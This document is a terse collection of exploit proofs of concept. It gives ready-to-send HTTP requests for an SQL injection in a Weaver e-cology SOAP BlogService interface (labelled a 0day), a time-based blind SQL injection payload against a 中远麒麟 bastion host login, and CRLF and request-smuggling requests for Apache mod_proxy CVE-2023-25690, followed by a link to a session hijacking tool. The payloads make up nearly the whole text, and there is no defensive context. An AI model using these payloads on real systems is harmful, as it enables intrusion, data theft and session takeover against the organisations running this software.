ecology: SQL injection in an interface, 0day PoC
POST /services/BlogService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:writeBlogReadFlag>
<web:string>1</web:string>
<web:string>injection point</web:string>
<web:string></web:string>
</web:writeBlogReadFlag>
</soapenv:Body>
</soapenv:Envelope>
中远麒麟 bastion host: SQL injection vulnerability PoC
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
CVE 2023 25690 proof of concept - a vulnerable mod_proxy configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to an HTTP request smuggling vulnerability
CVE-2023-25690 (PoC)
- Apache HTTP Server mod_proxy
CRLF Injection
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host:
Header Injection
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: 1.1.1.1
GitHub URL : https://github.com/dhmosfunk/CVE-2023-25690-POC
Session Hijacking Visual Exploitation
Session hijacking visual exploitation tool
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation